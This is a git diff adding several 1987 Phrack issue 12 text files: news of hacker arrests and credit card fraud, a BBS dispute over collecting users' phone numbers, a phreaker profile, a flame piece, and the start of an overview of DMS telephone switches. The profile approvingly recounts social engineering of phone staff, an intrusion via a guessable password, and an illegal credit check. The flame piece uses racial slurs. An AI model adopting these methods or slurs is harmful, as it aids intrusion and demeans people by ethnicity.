+identification.  Security personal is welcome to attend, but we request that
+you let us know ahead of time.  If anyone, especially security personnel,
+would like to speak at SummerCon please also let us know and we will schedule
+you in.
+
+:Knight Lightning
+______________________________________________________________________________
+
+Hackers Caught Using Credit Card To Buy More Equipment       February 20, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Ben L. Kaufman of The Cincinnati Enquirer
+
+                       "I was uneasy about the pickup."
+
+Two young "hackers" in Milford using an electronic bulletin board to get
+stolen credit card numbers and buy hardware to expand their computers.  Now
+they're in big trouble because unauthorized use of a credit card is a federal
+offense and the Secret Service caught them.  "Computer-aided credit card fraud
+is increasingly common, said special agent in charge, James T. Christian on
+Tuesday, "but using the filched name and number to enhance computer clout was
+a unique touch."
+
+The two youths had a $1,300 order sent to an abandoned house on Ohio 131E,
+Christian said, but when they picked it up an agent was waiting with the UPS
+deliveryman.
+
+John Martin Howard, 21, 5788 Meadowview Drive, Milford was cited before U.S.
+magistrate J. Vincent Aug Jr., who accepted his plead to guilty Monday and
+released him on his promise to return when summoned.
+
+"I was uneasy about the pickup," Howard recalled in a telephone interview. The
+risk of getting caught "was in the back of my mind."  And it was an awful
+moment when the Secret Service agent confronted him and his juvenile buddy,
+Howard added.  "I think they were surprised," Christian said.  Howard was
+charged with attempted use of an unauthorized credit card.  His juvenile
+partner -- who refused to comment Tuesday -- was turned over to his parents.
+
+Christian said the youths ordered equipment from Computer-Ability in suburban
+Milwaukee paying with the stolen credit card.  A sharp-eyed store employee
+noted purchases on that credit card were coming in from all over the country
+and called the Secret Service.  Within two weeks the trap in Milford was set.
+
+Howard said his young friend knew the Cincinnatian who led them to the
+bulletin board filled with the names and the numbers of stolen credit cards.
+"We got it from somebody who got it from somebody who got it from somebody on
+the east coast," Howard recalled.  That new acquaintance also boasted of using
+stolen card numbers from electronic bulletin boards to buy expensive
+accessories and reselling them locally at bargain process.
+
+He and his friend used the stolen credit card to upgrade his Atari 800 system,
+Howard said.  "We ordered a bunch of hardware to use with it."  In addition to
+the purchase that drew the secret service to them, Howard said they "ordered
+other stuff, but before we received anything, we were picked up."  Howard said
+he'd had the Atari about two years and was getting bored with it and home
+computers in general.
+
+He had taken computer programming for eight months after high school, he said,
+but hadn't used it.  He would like to try computer-aided design and
+engineering, but right now, he's working in a pizza parlor.  Christian said
+Howard's parents had been enthusiastic about his computer interests and
+friends who shared them.  "They though it would keep them out of trouble."
+
+Assistant U.S. attorney Kathleen Brinkman and Christian said the Cincinnati
+area investigation was continuing and numerous juveniles, some quite young,
+may be involved.
+                              Thanks to Grey Elf
+
+             Re-typed for PWN into lowercase by Knight Lightning
+______________________________________________________________________________
+
+Hang On...  Phone Rates Are Falling Again!                          March 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From Changing Times Magazine March 1987 Issue
+
+No news that long-distance rates are still headed down, but now local rates
+are poised to follow, at least in some areas.
+
+Competing long-distance carriers have already been forced to react to AT&T's
+January rate cut, which averaged 11.2%, with cuts of their own.  Now the
+Federal Communications Commission [FCC] may propose that an additional $1 or
+$2 be added to the subscribers line charge, the $2-a-month access charge that
+every residential customer pays.  If that happens it would compensate.
+
+Since AT&T's divestiture in January 1984, the telephone services component of
+the consumer price index has risen 17.4%, reflecting a 36.7% increase in local
+rates at the same time long-distance charges were falling.  But price
+increases for overall service have moderated each year, falling 2.7% in 1986
+from 4.7% in 1985 and 9.2% in 1984.  That trend should continue as local rates
+stabilize and even fall.  Wisconsin and Vermont, for example, have ordered
+local companies to make refunds, and a number of states - New York,
+Pennsylvania, Washington - are considering lowering rates to reflect the
+improved financial position of local phone companies.  Those companies will
+benefit from tax reform, and lower inflation and interest rates have resulted
+in lower expenses in several other areas.
+
+Things are not looking good for some of AT&T's competitors in the long
+distance business, however.  Forced to follow AT&T's rate cuts, both MCI and
+US Sprint are hard-pressed financially, and analysts don't rule out the
+possibility that one or both could get out of the long-distance business,
+potentially leaving AT&T a monopoly again.  But that would be "politically
+unacceptable," says analyst Charles Nichols of E.F. Hutton.  Some
+alternatives:  allowing regional phone companies to enter the long-distance
+business or allowing AT&T to keep more of the profits it earns from increased
+efficiency instead of forcing the company to cut rates.  That would take some
+pressure off competitors.
+
+                          Special Thanks to Stingray
+______________________________________________________________________________
+
+Police Arrest Computer "Hacker" Suspect                         March 15, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From the St. Louis Post-Dispatch
+
+   "MCI told police it was losing $2.7 million a month to such 'hackers.'"
+
+A computer software engineer [Robert Wong] has been arrested at his home in
+Maryland Heights, Missouri on suspicion of trying to get into the computer
+system of MCI Telecommunications Corporation.
+
+The case is the fourth in this area involving computer "hackers" who have
+tried in recent months to get into MCI's computer system, police say.
+
+Detective John Wachter of the Maryland Heights Police Department said the
+department would seek a warrant today charging the suspect with "tampering
+with computer users," a felony.
+
+The charge is being sought under a state law enacted last year to deal with
+hackers - people who try illegally to tap into other computer systems.
+
+The suspect is Robert Wong, 23, of the 2000 block of Maverick Drive, Maryland
+Heights, Missouri. Police tracked down Wong by a court-sanctioned "trap" on
+his phone after MCI learned that someone was trying to tap into its
+long-distance lines.
+
+In a written statement to police, Wong said he "came across" MCI's programs
+and access codes.  He said he was "amazed" when he got into the system. "I
+know it was illegal, but the urge of experimenting was too great," he told
+police.
+
+                         Typed For PWN by Taran King
+______________________________________________________________________________
+
+PWN Quicknotes
+~~~~~~~~~~~~~~
+In upcoming months P-80 will be moved from her ole TRS Model 1 to an IBM PC
+compatible.  In addition to a boost in storage capacity (amount still
+undecided), P-80 will be adding a new "user to user" direct file/program
+transfer thus allowing the membership the ability to privately send text or
+programs directly to another user.  There will also be the ability to forward
+a message with text/program attached) to another user after receipt. (2/26/87)
+
+                               Information from
+              <S><C><A><N> <M><A><N> & P-80 Information Systems
+------------------------------------------------------------------------------
+If you consider yourself a phreaker or a hacker in any way, shape or form,
+then read on!  The Telecom Security Group is sponsoring the first on-line
+hack/phreak survey.  It consists of about 30 minutes work of answering
+questions (or until you want to stop) that pertain to phreaking, hacking, the
+security, and the attitudes surrounding it all.
+
+You are allowed to identify yourself during the survey if you wish or you may
+remain totally anonymous.  It's really just the general answers that will
+count.  Call now:  914-564-6648 (914-LOG-ON-IT) and type SURVEY at the main
+prompt to get the survey.  Thanks for your involvement, and do spread the word
+to any board that considers itself phreak/hack oriented.
+
+                   Information by Taran King & Tuc (2/6/87)
+------------------------------------------------------------------------------
+Telecommunications giant AT&T is lying in its advertisements that claim it has
+an exclusive toll-free number for foreign clients to reach U.S. businesses,
+its competitor says in a lawsuit.
+
+Worldwide 800 Services Inc. says that it has filed suit against AT&T with the
+FCC, charging AT&T with false advertising.  The ads by AT&T claim that it can
+provide a global telephone network that would allow clients in foreign
+countries to call a toll-free number to reach businesses in the United States.
+AT&T claimed that "You won't find this type of service anywhere else."
+
+Worldwide 800 says that their company provides toll-free service from any
+foreign city to the U.S., whereas AT&T can only provide toll-free service on a
+countrywide basis.  An AT&T spokeswoman denied all of the charges, stating
+that the advertisement in question was neither fraudulent or deceptive.  If
+Worldwide 800 Services wins the case, they state that they will demand
+corrective advertising and seek monetary damages.
+
+                    Information from Lucifer 666 (3/1/87)
+______________________________________________________________________________
diff --git a/phrack12/11.txt b/phrack12/11.txt
new file mode 100644
index 0000000..b8465e9
--- /dev/null
+++ b/phrack12/11.txt
@@ -0,0 +1,258 @@
+                               ==Phrack Inc.==
+
+                    Volume Two, Issue 12, Phile #11 of 11
+
+             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+             PWN                                             PWN
+             PWN    >>>>>=-*{ Phrack World News }*-=<<<<<    PWN
+             PWN                 Issue XII/2                 PWN
+             PWN                                             PWN
+             PWN       Created, Compiled, and Written        PWN
+             PWN             by Knight Lightning             PWN
+             PWN                                             PWN
+             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Toll-Free Woes                                                January 26, 1987
+~~~~~~~~~~~~~~
+>From Time Magazine; reprinted in the February 1987 Issue of CO Magazine
+
+While Oral Roberts struggles with budgets, fundamentalist preacher Jerry
+Falwell faces a different kind of money pinch.  The Lynchburg, VA,
+televangelist has long used toll-free phone numbers to assist viewers seeking
+spiritual help.
+
+For many months Falwell foes, aware that each phone-in cost $1, have purposely
+clogged his lines.  An Atlantan programmed his computer to dial Falwell every
+30 seconds.  Before Southern Bell stepped in, the stunt cost Falwell $750,000.
+
+Late last year, the Daily Cardinal student newspaper at the University of
+Wisconsin -- Madison ran a column advocating "telephone terrorism" and listed
+several targets, including Falwell.
+
+The TV preacher estimates that annoyance calls cost him more than $1 million
+last year, not counting lost donations.  Falwell, who is considering legal
+action, regards the calls as "unlawful activities" that do "injury to the
+cause of Christ."
+
+[Well now...isn't that special?  And just where did all these people get the
+idea to do "injury to the cause of Christ?"  From me, Knight Lightning?  No, I
+don't think so.  From oh maybe Phantom Phreaker?  No, I don't think so.
+Possibly Lucifer 666, but the big question is...     Could it be... SATAN!!!?]
+
+                      Typed For PWN by Knight Lightning
+______________________________________________________________________________
+
+Voice numbers:  Are They Really Necessary?                      March 5, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+A recent series of events on ShadowSpawn BBS has attracted much attention in
+the hack/phreak community.  It seems that the sysop, The Psychic Warlord,
+denied access to Lex Luthor, Kerrang Khan, and Silver Spy because of their
+failure to leave valid voice phone numbers.  The following messages have been
+taken from ShadowSpawn BBS.  [Some posts have been re-formatted].
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+32/50: This board...
+Name: The Psychic Warlord #1
+Date: 6:36 pm  Thu Feb 26, 1987
+
+    Alright goddamn it, I'm so fucking pissed off that I'm just about ready to
+say Fuck It and take down the board for good.  Why?  Seems that few people are
+happy with the way I run this board.  No, not really with the way I run it,
+but more like the way I choose to validate my users.  Ok, fine...  You don't
+like it then get the fuck out and quit complaining.
+
+    I set certain rules that people have to abide by to get access to this
+board.  Very simple fucking rules.  And now I'm finding out that people don't
+want to abide by these rules, and basically tell me I'm fucked in the head for
+having and going by them.  What rules?  For one thing, and this is the major
+bitch-point here, new users (no matter WHO THE FUCK they are) are *REQUIRED*
+to leave a valid voice number where I or Ctrl can reach them at for
+validation.  No big fucking deal...  Just a goddamn phone number.
+
+    "Oh, but I can't give you my voice number.  I'm a hacker, and I do untold
+amounts of illegal things and I can't risk my number getting out."  Riiight.
+Like I'm really some fucking Fed who's gonna bust yer ass, or some geek who
+gives out peoples phone numbers to any-fucking-body who asks.  BULLSHIT!
+
+    I'm the Sysop of a (hopefully) respected BBS, and along with that goes a
+certain responsibility.  I'm not about to go passing out peoples numbers.  *I*
+have respect for other hackers privacy, unlike some people who choose to
+invade mine just for the fucking hell of it.  I require that new users leave
+their voice numbers for a number of GOOD reasons:
+
+1) Trust -- If they can trust me with their voice numbers, then I can trust
+            them with access to my board.  I need that kind of trust between
+            me and my users.  If they feel that they can't trust me enough to
+            give me a lousy phone number, then how in God's name am I supposed
+            to be expected to trust them at all??  My ass is on the line just
+            as much (if not more) than any user of this board!
+
+2) Security -- Ok...  So how do I know if someone is really a Fed or not?  I
+               don't!  I go by instinct.  Having a person's voice number let's
+               me call them for validation and get to know them a helluva lot
+               better than I could through e-mail.  Plus, if suspicion ever
+               arose about a user of my board being a Fed or not, how could I
+               check this out?  If I don't have their voice number, I have no
+               leads as to where to find or who the fuck this person really
+               is. Now I don't go checking everyone on the board via the
+               numbers they give me.  I have NEVER had to do that for ANY
+               user, but the possibility is there.  And rather than throw a
+               possibly innocent person off the board merely on a hunch, we
+               might be able to prove whether or not it's true.  This is
+               extremely hypothetical, but like I said...  the possibility is
+               there.
+
+   Ok, so why the hell should I have to require that established people, like
+Lex Luthor and Silver Spy, leave valid voice numbers?  Is it fair to the other
+users?  Hell no.  If I required only certain people to give me their numbers,
+then what does that do to their trust in me??  It's like me saying, "Well, I
+don't trust you...  I don't know you that well.  You have to sacrifice more
+than these guys to get access."  That's BULLSHIT, and I'm not about to do it.
+If one person is required to give a valid voice number, then every damn user
+is required to!
+
+   I've been getting a lot of shit the past couple days because I've denied
+access to some very well known and respected people in the hack/phreak world.
+Namely Lex Luthor, Silver Spy, and Kerrang Khan.  I denied all of them access
+because they all refused to leave a voice number.  Fine.  Then they don't get
+access.  Ctrl [Ctrl-C is a cosysop on ShadowSpawn] said I was crazy.  Taran
+said pretty much the same.  Taran also tried to get me to change my mind...
+to condescend, or go against what I believe in and how I believe this board
+should be run.  He (Taran) said that by my denying Lex and the others access
+that I would be hurting this board more than helping it.  ***I DON'T GIVE A
+DAMN***
+
+   I'm not impressed in the least with any of those peoples reputations.  I
+never have been a "groupie" and I'm not about to start now.  Whether or not
+they are good or not isn't the issue here, and some people don't seem to
+realize that.  Yes, Lex is good.  He's well known.  He's even a nice guy...
+I've talked to him before and personally I like him.  But I don't play
+favorites for anyone.  Not Lex, not Silver Spy, and not Kerrang Khan.  Nobody.
+
+   What really pissed me off, and I should have told Taran that I resented it
+at the time, is that TK said that apparently this board is "elite".  That I
+consider this board to be too good.  Personally I think this fucking board is
+overrated, and yes Taran...  I resented that remark.  I can't remember exactly
+what he said, but it was something like, "In your logon message you have
+'We're not ELITE, we're just cool as hell,' but apparently you ARE elite."
+
+   This board isn't "elite" and if I come off seeing that way sometimes, it's
+only because people are getting half the picture of what I'm doing.
+
+    Ok, so I deny Lex Luthor access to this board.  That's all you people seem
+to think about.  The actual denying of access.  You think, "How can he do
+that?!  What gall!  He must be a real egotistic bastard to think that Lex
+Luthor isn't good enough to be on this board!"  If you think that, and most of
+you have thought only that, then you're fucked in the head.
+
+   Yes, I realize who these people are!  Yes I know their reputations and how
+they are renowned for their skills as hackers and phreakers...  But like I
+said before, that's not the issue.  It never was.  I *KNOW* how good these
+people are.  I *KNOW* about their reputations and I respect them for it, but I
+don't care.  That's not why they've been denied access!
+
+   When I deny someone access to this board it's usually for one of two
+reasons;
+
+1) They left a false voice number  or
+2) They either blew off or left really crappy answers to the filter.
+
+    Personally I'd be thrilled to have Lex or Silver Spy on the board... and
+any of a number of people.  But these people can't find it in themselves to
+trust me. If they can't trust me, then I can't trust them.  It's as simple as
+that.
+
+   I'm not about to let anyone on this board that I can't trust.  It's not
+fair to the other users, and it's damn stupid of me.  I run this board the
+best way I know how.  I do what I do in respect to new user validations
+because it's the best way, through trial and error, that I have found to
+handle it.  If people can't respect the way in which I choose to run my board
+then I'd appreciate it if they never called.  And when regular users of my
+board start questioning the way I do thing, and telling me that I'm WRONG for
+doing things the way I believe they should be done, then I really start to
+wonder what the fuck I'm doing it for at all.  I'm not a quitter, and I don't
+like the idea of giving up and taking down the board.  I'm going to run this
+board the way I think is best, and I'm not about to conform to what other
+people think I should do.
+
+   I've probably stepped on some toes and offended some people with this, but
+that's just too damn bad.  I hate fighting the topic but I'll fight it if I
+have to.
+
+                          --==The Psychic Warlord==--
+
+
+37/50: Take a fucking valium
+Name: Taran King #45
+Date: 9:02 am  Sat Feb 28, 1987
+
+You're known for an explosive temper, PW as well as sometimes being extremely
+irrational.  My policy is to let people on the my board with voice numbers
+only.  Through the history, I've made maybe 5 exceptions.  Some of 'em include
+Lex, Spy (at first), Tabas, Videosmith, and Phucked Agent 04.  Now, I never
+got anything out of PA04 because he got a "call" soon after he got on the
+board, but the rest of the members have contributed extremely well to the
+board.  I just made sure I knew it was really them by referencing and cross
+referencing.
+
+If your morals are that unbendable, PW, then you need to relook at the purpose
+of this board.  If it's to spread phreak/hack knowledge as you said on the
+phone, then to have those people on with the experience that they have would
+hardly hinder the board.  I seriously doubt anyone would feel offended if any
+of the forementioned people got on here without leaving a valid voice number,
+being that they're not on any other board with a voice number.
+
+I know that Lex is not giving out his number to even the best of his
+friends.  Spy is really careful about it these days.  Not so sure about
+Kerrang but he's travelling about now so he's not in one place for too long
+nowadays.  It's your board and I was trying to give you some constructive
+criticism, but you took it the wrong way.  You don't have to claim you're
+ELITE to be elite.  Elite merely means that you've got the respected members
+of the community on board.  Well, you've got 'em.  If you don't like it, I
+suggest you go through and purge the log like a big dog.  Actually, fuck it.
+I'm tired of getting into arguments for trying to help someone.  Feel free to
+delete my account if you feel that I've not contributed enough information to
+the board, or if you've rethought the purpose and decide that it's not for
+what I've contributed, dump me.  Fuck dis
+-TK
+
+
+44/50: Well...
+Name: The Psychic Warlord #1
+Date: 4:57 pm  Sun Mar 01, 1987
+
+   I'm glad that some people agree with me on this.  I can understand Lex's
+point of view, too.  I can also remember a time when I myself refrained from
+giving my number to any sysops.  But...  I've changed my point of view
+considerably after living the Sysop life for well over 1.5 years.  Now if I
+ever wanted access to a board, and the Sysop of that board asked for my voice
+number, I'd give it to him.
+
+   I've given Lex access to this message base for a short period of time so
+that he can check out the discussion.  He called me voice the other day and we
+talked for a while about this whole biz.  I'd like him, and Spy, on the board,
+and possibly they'll change their minds.  If not, that's cool.  I'm just going
+to let the whole thing kind of slide from here on out.  If they change their
+minds, great...  Well, Adios.
+
+                          --==The Psychic Warlord==--
+
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Kerrang Khan, when notified that he must leave a voice number, said "there is
+no reason Psychic Warlord would need any user's phone number."  He also stated
+that the fact that PW insisted on voice numbers was very "suspicious."
+
+Silver Spy, when notified that he must leave a voice number, never bothered
+calling again.
+
+Lex understood the whole situation and remained cool.  He said he could see
+why a sysop would need voice numbers of his users.  Lex was worried about the
+board he left it on getting busted and the authorities getting his number.  So
+PW, in response to this deleted all users phone numbers from the board and
+encrypted them in a hidden sub-directory.  Now the numbers are there only and
+are totally hidden.
+                           Information Provided By
+
+            Lucifer 666/Psychic Warlord/ShadowSpawn BBS/Taran King
+______________________________________________________________________________
+
diff --git a/phrack12/2.txt b/phrack12/2.txt
new file mode 100644
index 0000000..1338198
--- /dev/null
+++ b/phrack12/2.txt
@@ -0,0 +1,136 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 12, Phile #2 of 11
+
+                           ==Phrack Pro-Phile IX==
+
+                      Written and Created by Taran King
+
+                                   3/17/87
+
+         Welcome to Phrack Pro-Phile V. Phrack Pro-Phile is created to bring
+info to you, the users, about old or highly important/controversial people.
+This month, I bring to you a name from the past...
+
+                            Agrajag The Prolonged
+                            ~~~~~~~~~~~~~~~~~~~~~
+
+         Agrajag was popular on many boards and hung out with many of the
+stronger names in the phreak/hack community.
+------------------------------------------------------------------------------
+Personal
+~~~~~~~~
+             Handle: Agrajag The Prolonged
+           Call him: Keith
+       Past handles: None
+      Handle origin: Fictional character in Hitchhiker Trilogy
+      Date of Birth: 6/14/67
+Age at current date: 19 years old
+             Height: 6'2"
+             Weight: 139 lbs.
+          Eye color: Brown
+         Hair Color: Depends on the day (Orange, Brown, Black, Hot Pink, etc.)
+          Computers: TRS Model III, worked his way up to a TVI 950 Dumb
+                     Terminal
+
+------------------------------------------------------------------------------
+         Agrajag started phreaking and hacking in about 1979 through the help
+of some friends of his.  He originally started hacking (programming) on a
+Vector 8080 in 4th grade.  His instructor then is now one of the top 5
+computer instructors. Phreaking began with, of course, codes but he was very
+interested in how the phone system worked.  He had read some books on the
+phone company and their evils in their earlier days and he was very interested
+in the very idea of becoming an operator.  Members of the elite world which he
+has met include Tuc, BIOC Agent 003, Broadway Hacker (negative), and Cheshire
+Catalyst, all at a Tap meeting he attended.  On regular BBSes, there were
+listings for other BBSes which turned out to eventually be phreak BBSes.  Some
+of the memorable phreak boards he was on included WOPR, OSUNY, Plovernet, and
+Pirate 80.  His phreaking and hacking knowledge came about with the group of
+people including Tuc, BIOC, and Karl Marx.
+
+         Agrajag was a video game programmer for the last American owned video
+game manufacturer, Cinematronix, Inc. (of Dragon's Lair, Space Ace, World
+Series, and Danger Zone fame, of which he helped with World Series and a big
+part of Danger Zone) which went bankrupt a bit over a month ago.
+
+         Agrajag takes interviews for magazines (such as this) which keeps up
+his phreak/hack activity.  He (and a bunch of others) were written up in a USA
+Today article as well as being interviewed by a local paper when The Cracker
+(Bill Landreth) got busted (they took pictures of the back of his head in
+front of his computer).
+
+         Agrajag was never in any major phreak groups except for The
+Hitchhikers (Bring your towel!) which was just a group of local friends.
+
+------------------------------------------------------------------------------
+
+        Interests: Telecommunications (modeming, phreaking, hacking,
+                   programming), music, concerts, club hopping, and video
+                   games.
+
+Agrajag's Favorite Thing
+------------------------
+
+       Club/Bar hopping: Tijuanna (TJ)
+
+Most Memorable Experiences
+--------------------------
+
+Going officing.  Tuc, BIOC, and he were let into a local CO and they used
+          their copying machine to make copies of their manuals.  They
+          replaced the paper [over 2 reams] later and didn't steal anything
+          major besides the paper and a few NY Bell signs.
+Called supervisors saying that they had witnessed some trunks red-lighting and
+          there would be severe problems if they didn't contact this guy,
+          Abbot Went, in San Francisco.  There were about 10 supervisors in
+          mass hysteria (on Thanksgiving) wondering what to do.  Later, they
+          called up Abbot again saying they were the White House switch and
+          said some kids were fooling around.
+Breaking into his school's computer in his senior year mid-semester.  He had
+          scanned it out on a school prefix and the login and password was the
+          name of his school.  It was a TOPS-20 system and he was well enough
+          versed in TOPS-20 to know what to do.  The next day, he told the
+          vice-principal that he had broken into the computer and that they
+          had some major security problems.  They said he was bullshitting and
+          he told them to read their mail.  Then, later, he brought in his
+          equipment and showed them with the principal there.  He was
+          threatened by the principal with police, etc. but he told them to go
+          to hell.  He was later offered a job helping the security on the
+          system but instead, he told them how they could solve the security
+          problem and didn't take the job.
+Agrajag's teacher asking him to do a credit check on someone illegally.  He
+          eventually did part of it, but the teacher was an asshole so he
+          didn't give all the information to him.
+Getting flown to the Tap meeting by a friend.
+
+Some People to Mention
+----------------------
+
+Tuc
+BIOC Agent 003
+Karl Marx
+Automatic Jack
+
+All for being friends and all around good people and phreaks.
+
+------------------------------------------------------------------------------
+
+         Agrajag is out and out against the idea of the destruction of data.
+He hated a person intensely because they posted private lines with
+instructions on how to maim a system owned by someone who was already hated.
+He deleted the message (he was co-sysop) and it became a bit controversial.
+He hated that then and still has no respect for anyone who does this.  Where
+have all the good times gone?
+
+------------------------------------------------------------------------------
+
+I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming
+in the near future.  ...And now for the regularly taken poll from all
+interviewees.
+
+Of the general population of phreaks you have met, would you consider most
+phreaks, if any, to be computer geeks?  The general populus, yes, but good
+phreaks, no.  Thank you for your time, Agrajag.
+
+                                            Taran King
+                                   Sysop of Metal Shop Private
diff --git a/phrack12/3.txt b/phrack12/3.txt
new file mode 100644
index 0000000..ec18aae
--- /dev/null
+++ b/phrack12/3.txt
@@ -0,0 +1,84 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 12, Phile #3 of 11
+
+                %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+                %                                           %
+                %    The Life & Times of The Executioner    %
+                %                                           %
+                %              by Oryan QUEST               %
+                %                                           %
+                %            Written on 3/16/87             %
+                %                                           %
+                %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+
+
+Introduction:
+------------
+This file was not written with the intention of being cute, funny or to tell
+fellow phreaks and hacks how lame or stupid they are.  It was written to open
+the eyes of these idiots to see what the REAL story is.
+
+The Executioner/Mikey
+---------------------
+I'm am sure the majority of you have heard of "Exy."  His claim to fame is
+simply telling people how lame they are or how great and sexy he is.  He also
+claims to be wealthy and that Phreak Klass 2600 is the best bulletin board on
+this side of the galaxy.  Let us examine some key events.
+
+When Metal Shop Private was up, Mr. Sexy Exy (oh and I doubt he really is),
+proceeded to rag on everyone on the system with the exception of a few that he
+ass-kissed.  He then turns around when Phreak Klass 2600 (and I am in no way
+ragging on Phreak Klass) goes up, to ask everyone he has annoyed for over 2
+months and badgers them to call.  Now, Mike, I seriously doubt you are as sexy
+as you claim for several reasons.  Just by the nature of your attitude, the
+way you think you are powerful because you can "tell" people about their lives
+and families when you yourself are a Chinese bastard who has an unemployed
+father that can barely speak the English language.
+
+                       "Miko ith no heeahh riiitte nao"
+                        (Michael is no here right now)
+
+You have ragged on Arthur Dent when you know that you will NEVER receive the
+admiration or stature whether it be socially or economically he has attained.
+You have ragged on Dr. Doom when he has achieved more than you can ever hope
+for.  You only commenced to rag on him when he turned down your offer to join
+PhoneLine Phantoms.  This is because he refused to be associated with an
+asshole like you.  You continually show signs of immaturity (I am not saying I
+am perfect) by poking fun at other people's races (blacks, spics, Iranians)
+when you yourself are nothing but a rice dick.
+
+You bad mouth people but, when you need their help you beg for it and ask them
+to be cool.  You write stupid poems and rhymes about people when they are a
+TOTAL misrepresentation of facts.  You claim Dr. Doom is so ugly he could
+never leave his room.  Tell me, have you ever met Dr. Doom?  Isn't it true
+that you ragged on him only because he didn't want anything to do with you,
+your group, and your image?
+
+Are you going to rag on me now and prove all the points I have brought out?  I
+think so.  You ragged on me, telling me my family receives government cheese
+handouts and telling me what a loser I am when you yourself have never met me
+or bothered to seek the real facts.  You then proceeded to badger me to join
+your new "legion of queers," The Network Technicians telling me how cool it
+would be and begging me to help you learn.  But don't I receive government
+cheese handouts?  Aren't I such a loser?  Mr. Solid State trusted you and
+joined PLP.  He thought nothing bad of you at the time.  He just considered
+all the rumors about you to be false or misrepresentation. When PLP dissolved,
+he saw no purpose to be in any longer and dropped out.  You proceeded to rag
+on him, when you know you aren't half the man he is.  You don't even possess
+half the knowledge or personality he has.  Tell me, what gives you such
+authority to rag on people?  What makes you so supreme?  Why are you so rich,
+when you are 18 and don't even have a car, when you go on and on about your
+parents?
+
+You rag on Atlantis because you were kicked off.  Now you tell people how lame
+it is and how stupid The Lineman and Sir William are.  When you know that they
+were sick of your, "I am supreme attitude," of your childish antics and your
+lack of knowledge of any kind.
+
+Well, Exy, rag on me now, tell me how lame I am, insult me.  Make your poems,
+songs, and raps.  Tell me what kind of a loser I am.  Insult Solid State, show
+us just how childish you can be.  Until then, go back into your dream world
+and leave us alone.
+
+                                 Oryan QUEST
diff --git a/phrack12/4.txt b/phrack12/4.txt
new file mode 100644
index 0000000..51d612d
--- /dev/null
+++ b/phrack12/4.txt
@@ -0,0 +1,422 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 12, Phile #4 of 11
+
+          <%><%><%><%><%><P><h><a><n><t><a><s><i><e><%><%><%><%><%>
+          <S>    A Tribunal Communications Ltd. (c) 1987        <S>
+          <h>                                                   <p>
+          <a>Understanding the Digital Multiplexing System (DMS)<a>
+          <d>                   Part 1                          <w>
+          <o>                By Control C                       <n>
+          <w><%><%><%><%><%><R><e><a><l><m><%><%><%><%><%><%><%><!>
+
+
+
+
+  The DMS switching system, is a lot smaller than normal systems. It takes up
+less than 16% of the space for the same number of Step-By-Step (SXS) lines and
+20% of cross bar.  This is done by taking the hardware out of the CO and
+putting them closer to a group of subscribers. Then central office services
+can be provided over shorter loops.
+
+  DMS offers remote switching with a bunch of remote modules in a bunch of
+sizes and capabilities. Some include SXS replacement or growth, Outside plant
+cable relief, and Office feature's.  The use of remote modules give the CO
+more floor space that would usually be used by the Line Concentrating Modules
+(LCMs), Main Distribution Frame (MDF), and cable equipment.  The advantage of
+these modules is that it extends the service radius of the CO, this means
+outside plant savings. Remote modules can be located up to 150 miles away
+without messing up transmissions.
+
+  Other advantages of the DMS system are that it allows integration between
+Transmission facilities and switching systems.  It's hardware & software is
+designed to give a full range of switching applications for Private Branch
+Exchange (PBX) business systems, local, toll, and local/toll requirements. The
+same Central Control Complex (CCC) and switching networks are used throughout
+the whole system.  The only difference between each system is the peripheral
+units, and software packages. It has a Maintenance and Administration Position
+(MAP) which is a integrated multifunction machine interface that switch
+maintenance, line and trunk network management, and service order changes can
+be carried out.
+
+  The software for the central processor is written in PROTEL, a high level
+pascal based language.  Peripheral processors use a XMS-Pascal software
+language.
+
+  DMS has a high line and trunk capacity. It has up to 100,000 lines on a
+DMS-100 or 60,000 trunks on a DMS-200.  It also gives up to 1.4 million
+two-way CCS through the switching network.  The processor can accept up to
+350,000 call attempts.
+
+  Here's a list of the DMS systems in use today:
+
+DMS-100 - is a class 5 local office with the ability to handle 1,000 to
+100,000 lines.  It can give basic telephone service or expanded to handle IBN
+custom calling features.  The DMS-100 MTX gives cellular radio services.  A
+local office can also be adapted to Equal Access End Office (EAEO).
+
+Remote Switching Center (RSC) - Ability to handle up to 5,760 lines.
+
+Remote Line Concentrating Module (RLCM) - Ability to handle up to 640 lines.
+It uses host Line Concentrator Module (LCM) that can be used by the RSC or
+directly by the host DMS-100.
+
+Outside Plant Module (OPM) - Ability to handle up to 640 lines. This also can
+be used by the RSC or directly by the host DMS-100.
+
+Subscriber Carrier Module (SCM-100) - There are three basic types of
+SCM-100's:
+   1- Subscriber Carrier Module Rural (SCM-100R) - This eliminates the central
+      office Central Control Terminal (CCT) by integrating directly into the
+      DMS-100 through the DMS-1 span lines.
+   2- Subscriber Carrier Module SLC-96 (SCM-100S) - This gives a direct
+      interface between DMS-100 and AT&T's SLC-96 digital loop carrier
+      systems.
+   3- Subscriber Carrier Module Urban (SCM-100U) - It's used as an interface
+      to the DMS-1 Urban.  The DMS-1 urban is a digital subscriber carrier
+      system modified for use in Urban areas.  It gives Plan Ordinary
+      Telephone Service (POTS) and special services between a central office
+      and residential and business communities. It has the ability to handle
+      576 lines of POTS and special services.
+
+DMS-200 - Has the ability to handle from a few hundred to 60,000 trunks.  This
+switch can also serve a Access Tandem (AT) function. The Traffic Operator
+Position System (TOPS) puts operator services into the DMS-200.  Operator
+Centralization (OC) allows a single operator location by using the TOPS
+positions to transfer operator services from other DMS-200 toll centers.  The
+Auxiliary Operator Services System (AOSS) let operator services on calls that
